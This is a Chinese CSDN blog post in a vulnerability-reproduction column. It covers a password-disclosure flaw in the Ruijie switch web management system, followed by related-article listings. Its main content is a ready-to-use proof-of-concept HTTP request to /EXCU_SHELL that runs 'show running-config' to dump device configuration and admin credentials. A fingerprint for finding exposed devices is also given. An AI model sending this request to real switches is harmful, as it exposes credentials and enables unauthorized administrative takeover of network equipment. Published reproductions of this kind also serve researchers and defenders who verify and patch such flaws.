锐捷交换机WEB管理系统EXCU_SHELL信息泄露漏洞(含批量验证poc)

已于 2024-04-15 20:55:01 修改
阅读量311 收藏
点赞数 9
分类专栏: 漏洞复现 文章标签: 前端 web安全
于 2024-04-15 20:54:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137795202
版权

漏洞描述

锐捷交换机WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。

漏洞影响版本

锐捷交换机WEB 管理系统
body=”img/free_login_ge.gif” && body=”./img/login_bg.gif”

漏洞复现

漏洞验证poc

GET /EXCU_SHELL HTTP/1.1
Host: XX.XX.XX.XX
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cmdnum: 1
Command1: show running-config
Confirm1: n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close

了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 9
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞
xiaokp7的博客
09-13 738
锐捷交换机 WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。
网络的核心所在 深入了解交换机漏洞
weixin_34291004的博客
04-05 117
IDC报告显示,交换机市场近年来一直保持着较高的增长势头,到2009年市场规模有望达到15.1亿美元。交换机在企业网中占有重要的地位,通常是整个网络的核心所在,这一地位使它成为******和病毒肆虐的重点对象,为保障自身网络安全,企业有必要对局域网上的交换机漏洞进行全面了解。以下是利用交换机漏洞的五种***手段。 < B>VLAN跳跃*** 虚...
锐捷EWEB网管系统RCE漏洞
最新发布
一个努力学习网安的小牛马
05-11 611
锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。使用cookie向/flow_control_pi/flwo.control.php?用post请求访问/ddi/server/login.php页面并提交admin参数可以获得管理员的cookie。在该系统的/flow_control_pi/flwo.control.php的文件中存在命令执行参数。
[转]网络的核心所在 交换机漏洞全面了解
weixin_33801856的博客
09-27 229
本文转自:http://netsecurity.51cto.com/art/200705/47465.htm 原问如下: IDC报告显示,交换机市场近年来一直保持着较高的增长势头,到2009年市场规模有望达到15.1亿美元。交换机在企业网中占有重要的地位,通常是整个网络的核心所在,这一地位使它成为黑客入侵和病毒肆虐的重点对象,为保障自身网络安全,企业有必要对局域网上的交换机漏洞进行全面了解。以...
交换机漏洞全面了解
软体疯子专栏
04-02 1519
 IDC报告显示,交换机市场近年来一直保持着较高的增长势头,到2009年市场规模有望达到 15.1亿美元。交换机在企业网中占有重要的地位,通常是整个网络的核心所在,这一地位使它成为黑客入侵和病毒肆虐的重点对象,为保障自身网络安全,企业 有必要对局域网上的交换机漏洞进行全面了解。以下是利用交换机漏洞的五种攻击手段。  VLAN跳跃攻击   虚拟局域网(VLAN)是对广播域进行分段的方法。VLAN还经
交换机漏洞
weixin_34362875的博客
07-27 219
可以发送并接收这些BPDU,以确定哪个交换机拥有最低的网桥ID,拥有最低网桥ID的那个交换机成为根网桥(Root Bridge)。 根网桥好比是小镇上的社区杂货店,每个小镇都需要一家杂货店,而每个市民也需要确定到达杂货店的最佳路线。比最佳路线来得长的路线不会被使用,除非主通道出现阻塞。 根网桥的工作方式很相似。其他每个交换机确定返回根网桥的最佳路线,根据成本来进行这种...
锐捷交换机常用功能配置案例集(V1.0).zip
03-25
本资源"锐捷交换机常用功能配置案例集(V1.0).zip"显然是一个关于锐捷交换机配置的实践指南,包了多个实际操作中的配置案例,旨在帮助用户更好地理解和掌握锐捷交换机的日常管理和维护。 在配置锐捷交换机时,...
锐捷交换机配置模版
02-25
锐捷交换机配置基础命令
锐捷交换机安装配置命令行以及升级固件合集
07-23
教程名称:锐捷交换机安装配置命令行以及升级固件合集       课程目录: 【】RG 锐捷版实验手册(锐捷路由及交换) 【】交换机配置手册(锐捷) 【】锐捷RG-S3760-24交换机配置手册...
锐捷交换机命令大全--全部的哦
04-29
交换机端口分配到VLAN 1.配置Port VLAN Switch(config-if)#switchport access vlan <1-4094> 2.配置Tag VLAN Switch(config-if)#switchport mode trunk 1).配置本地(native)VLAN Switch(config-if)#...
锐捷商通奶茶管理系统V11安装视频教程
08-21
鉴于很多新手朋友不会安装锐捷商通系列软件,故而出此视频教程!仅供参考!
锐捷 Smartweb管理系统 密码信息泄露漏洞
孤桜懶契
04-10 1888
漏洞描述 i ⭐锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。 漏洞影响 s ✅锐捷网络股份有限公司 无线smartweb管理系统 空间测绘 d ⭕FOFA:title="无线smartWeb--登录页面" 漏洞复现 ✅访问首页,存在账号guest/guest登陆 而且响应中包了 admin密码的base64加密,直接全局搜索admin可以看到 访问未授权路径/web/xml/webuser-auth.
多个高危漏洞可导致思科交换机和防火墙遭 DoS 攻击
smellycat000的专栏
08-25 283
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周三,思科宣布修复产品中的六个漏洞,其中三个是位于 NX-OS 和 FXOS 软件中的高危漏洞,可被用于触发拒绝服务条件。在这些影响Firepower 4100 和 Firepower 9300 安全设备和 UCS 6300 系列互联结构的 FXOS 软件漏洞中,其中最严重的是CVE-2023-20200,它是对特定 SNMP 请求处理不当漏洞...
思科提醒:多款交换机存在多个RCE漏洞且利用代码已公开
smellycat000的专栏
05-18 749
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士今天,思科提醒客户称,多款 Small Business 系列交换机中存在四个严重的远程代码执行漏洞,且利用代码已遭公开。这四个漏洞的 CVSS 评分为9.8分,如遭成功利用可导致未认证的攻击者以根权限在受攻陷设备上执行任意代码。这些漏洞的CVE漏洞编号是CVE-2023-20159、CVE-2023-20160、CVE-2023-20161和C...
思科智能交换机受多个严重漏洞影响
smellycat000的专栏
06-18 544
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士思科修复了 Cisco Small Business 220 Series Smart Switches 中的多个高危漏洞,它们可...
Netgear业务交换机被曝15个漏洞,有些不修复
smellycat000的专栏
03-11 863
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队NCC Group 公司的研究员在Netgear(“网件“)的 ProSAFE Plus JGS516PE 和 GS116Ev...
思科修复NSA报告的Nexus 交换机DoS漏洞及其它
smellycat000的专栏
02-25 654
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周,思科宣布修复位于 FXOS 和 NX-OS 网络操作系统中的四个漏洞,其中一个拒绝服务漏洞由NSA报告。最严重漏洞在这四个漏洞中,...
速修复!Netgear交换机曝3个严重的认证绕过漏洞
smellycat000的专栏
09-07 537
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士昵称为 “Gynvael Coldwind” 的波兰安全研究员在网件中找到并报告了网件交换机中的三个严重漏洞 Demon’s Cries...
锐捷 Smartweb管理系统 命令执行漏洞
热门推荐
LiBai'S BLOG
11-01 2万+
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷Smartweb系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
锐捷交换机开启web管理
09-06
锐捷交换机可以通过开启web管理功能来实现通过Web界面进行管理和配置的功能。开启web管理可以通过以下步骤来完成。 首先,连接到锐捷交换机的管理端口。通常情况下,我们可以通过串口或者网络连接方式来连接到交换机的控制台。 在连接上交换机的控制台后,我们需要输入管理员账号和密码进行登录,如果之前没有设置过管理员账号和密码,可以使用默认的用户名和密码来登录。 登录成功后,我们需要进入交换机的配置界面。在配置界面内,我们可以对交换机进行各种管理和配置操作。要开启web管理功能,我们需要找到相关的选项。通常,这个选项应该在交换机的管理设置或者系统配置中。 进入相关的设置选项后,我们可以找到一个“启用web管理”或者“开启web界面”之类的选项。通常,该选项默认是关闭的,我们需要将其启用。 开启web管理后,我们需要保存配置并退出交换机的配置界面。然后,我们可以通过浏览器访问交换机的IP地址,进入web管理界面。 通过web管理界面,我们可以完成很多管理和配置操作,比如修改端口设置、配置VLAN、配置ACL、查看设备状态等等。 总的来说,锐捷交换机开启web管理功能可以让我们通过一个简单的Web界面进行管理和配置操作,更加方便和易于操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值